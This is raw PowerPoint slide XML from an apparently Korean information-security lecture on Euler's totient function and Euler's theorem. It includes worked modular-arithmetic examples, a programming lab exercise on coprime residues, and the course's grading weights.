          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400">
              <a:latin typeface="Nanum Gothic"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400"/>
              <a:t>ex)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>φ(7) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>값은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400"/>
              <a:t>   { 1, 2, 3, 4, 5, 6} =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>φ(7) = 6</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="240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sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>오일러</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t> a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400"/>
              <a:t>와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400"/>
              <a:t>m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400"/>
              <a:t>이 정수이고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" err="1"/>
              <a:t>서로소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" err="1"/>
              <a:t>일때</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400"/>
              <a:t>, </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="240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a:t>ex)  a = 5, m = 6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400"/>
              <a:t>    5^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t> φ(6) = 5^2 = 25 = 6*4 + 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>≡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>(mod 6)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400">
              <a:latin typeface="Nanum Gothic"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>ex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400"/>
              <a:t>)  a = 2, m = 7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400"/>
              <a:t>    2^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t> φ(7) = 2^6 = 64 = 7*9 + 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>≡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>(mod 7)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400">
              <a:latin typeface="Nanum Gothic"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>ex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400"/>
              <a:t>)  a = 3, m = 7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400"/>
              <a:t>    3^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t> φ(7) = 3^6 = 729 = 7*104 + 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>≡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>(mod 7)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="240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a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>현대암호 실습 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>오일러</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>   다음 조건에 맞게 프로그래밍 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>하시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>오일러</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>입력 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>으로 받는다</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이때</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="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출력 후</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a:t>m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>과 서로소가 되는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>보다 작은 양의 정수를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>리스트로 출력한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>이때</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>형식은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    78</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>”  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>의 포맷으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>숫자와 공백을 포함 총 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>칸이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>번에서 출력했던 수 들의 곱을 출력한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>입력 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>으로 받는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>이때</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="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출력 후</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>    단</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>,  “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" kern="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>exit</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" kern="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a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>번에서 출력했던 정수들의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>를 곱하여</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>, m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>modular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>을 취해준 값을 리스트로 출력한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>이때</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>형식은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    78</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>”  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>의 포맷으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>숫자와 공백을 포함 총 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>칸이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>번에서 출력했던 수 들의 곱을 출력한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>다시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
              <a:t>번으로 돌아간다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="110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sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Inforsec</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>강의안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정보보호</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t>시험</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>(60%)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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t>실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>(30%)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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t>태도</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>(10%)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>오일러</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>ex) m = 7 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400"/>
              <a:t>1 * 2 * 3 * 4 * 5 * 6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>≡ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400"/>
              <a:t>(1*a) * (2*a) * (3*a) * (4*a) * (5*a) * (6*a)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400"/>
              <a:t>1 * 2 * 3 * 4 * 5 * 6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>≡ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400"/>
              <a:t>1 * 2 * 3 * 4 * 5 * 6 * a ^ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>φ(7)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>≡ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400"/>
              <a:t>a ^ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="240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a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>-&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>왜 순서만 바뀌고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:solidFill>
